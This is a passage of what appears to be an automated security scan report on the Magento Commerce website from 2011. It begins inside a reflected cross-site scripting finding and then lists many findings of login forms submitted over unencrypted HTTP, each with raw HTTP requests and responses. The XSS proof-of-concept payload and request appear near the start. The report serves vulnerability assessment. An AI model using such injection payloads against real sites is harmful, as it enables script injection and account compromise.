The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71721"><script>alert(1)</script>7f09bd527cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/skin71721"><script>alert(1)</script>7f09bd527cd/frontend/enterprise/mc/favicon.ico HTTP/1.1
Host: www.magentocommerce.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; frontend=nnrlork2th3c63an6nrgfjevc3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: frontend=nnrlork2th3c63an6nrgfjevc3; expires=Sat, 13-Aug-2011 15:02:42 GMT; path=/products; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: exp_uniqueid=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_userhash=deleted; expires=Thu, 12-Aug-2010 15:02:41 GMT; path=/; domain=magentocommerce.com
Status: 404 File not found
Content-Length: 23605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Magento
...[SNIP]...
<input type="hidden" name="login[back_url]" value="http://www.magentocommerce.com/products/skin71721"><script>alert(1)</script>7f09bd527cd/frontend/enterprise/mc/favicon.ico" />
...[SNIP]...

2. Cleartext submission of password
There are 150 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.magentocommerce.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:40:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: guid=db13949594b1b3d2138f3212e370aacf; expires=Mon, 06-Aug-2012 13:40:32 GMT; path=/
Set-Cookie: exp_domain=magentocommerce.com; expires=Sat, 11-Aug-2012 23:48:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_visit=997810832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_last_activity=1313170832; expires=Sat, 11-Aug-2012 13:40:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:40:32 GMT
Content-Length: 35354

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.2. http://www.magentocommerce.com/!!!--

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /!!!--

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /!!!-- HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:16:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176591; expires=Sat, 11-Aug-2012 15:16:31 GMT; path=/; domain=magentocommerce.com
Content-Length: 32486

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.3. http://www.magentocommerce.com/answers/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /answers/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /answers/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1313176378; expires=Sat, 11-Aug-2012 15:12:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fanswers%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=deleted; expires=Thu, 12-Aug-2010 15:12:57 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Set-Cookie: Answers-Volatile=-1-1313334778%7Cf12320d6368d67123b829b3e7e5c4f71%7C1313161978%7C-1%7C1313334778; expires=Fri, 12-Aug-2011 19:12:58 GMT; path=/; domain=www.magentocommerce.com
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-Garden-Version: Vanilla 2.0.17.9
Last-Modified: Fri, 12 Aug 2011 15:12:58 GMT
Content-Length: 54246

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-ca">
<head>
   <title>Magento Answer
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
        <form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
           <input type="hidden" name="login[back_url]" value="/answers/">
...[SNIP]...
</label>
           <input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]" /></p>
...[SNIP]...

2.4. http://www.magentocommerce.com/blog

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /blog HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176376; expires=Sat, 11-Aug-2012 15:12:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:57 GMT
Content-Length: 92426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.5. http://www.magentocommerce.com/blog/comments/ebay-agrees-to-acquire-magento/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/ebay-agrees-to-acquire-magento/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /blog/comments/ebay-agrees-to-acquire-magento/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176433; expires=Sat, 11-Aug-2012 15:13:53 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A1%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:53 GMT
Content-Length: 45747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.6. http://www.magentocommerce.com/blog/comments/magento-wins-best-new-open-source-project/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-new-open-source-project/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /blog/comments/magento-wins-best-new-open-source-project/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176465; expires=Sat, 11-Aug-2012 15:14:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-new-open-source-project%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:26 GMT
Content-Length: 80846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.7. http://www.magentocommerce.com/blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /blog/comments/magento-wins-best-of-open-source-enterprise-applications/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /blog/comments/magento-wins-best-of-open-source-enterprise-applications/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176441; expires=Sat, 11-Aug-2012 15:14:01 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A72%3A%22%2Fblog%2Fcomments%2Fmagento-wins-best-of-open-source-enterprise-applications%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:04 GMT
Content-Length: 58972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.8. http://www.magentocommerce.com/boards/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /boards/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176405; expires=Sat, 11-Aug-2012 15:13:25 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fboards%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:27 GMT
Content-Length: 293542

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.9. http://www.magentocommerce.com/boards/viewforum/10252/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /boards/viewforum/10252/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176393; expires=Sat, 11-Aug-2012 15:13:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewforum%2F10252%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:16 GMT
Content-Length: 112502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.10. http://www.magentocommerce.com/boards/viewthread/1647/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewthread/1647/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /boards/viewthread/1647/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176416; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewthread%2F1647%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: exp_forum_topics=a%3A0%3A%7B%7D; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:37 GMT
Content-Length: 116291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.11. http://www.magentocommerce.com/bug-tracking

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /bug-tracking

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /bug-tracking HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176426; expires=Sat, 11-Aug-2012 15:13:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbug-tracking%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:46 GMT
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.12. http://www.magentocommerce.com/casestudies

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /casestudies

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /casestudies HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176318; expires=Sat, 11-Aug-2012 15:11:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fcasestudies%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:58 GMT
Content-Length: 52582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div class="login-menu" id="mMenu" style="display:none;">
<form method="post" action="http://www.magentocommerce.com/products/customer/account/loginPost/">
<p>
...[SNIP]...
</label>
<input type="password" style="width: 142px;" class="input-topbg" id="password" name="login[password]"/></p>
...[SNIP]...

2.13. http://www.magentocommerce.com/company/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /company/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175799; expires=Sat, 11-Aug-2012 15:03:19 GMT; path=/; domain=magentocommerce.com
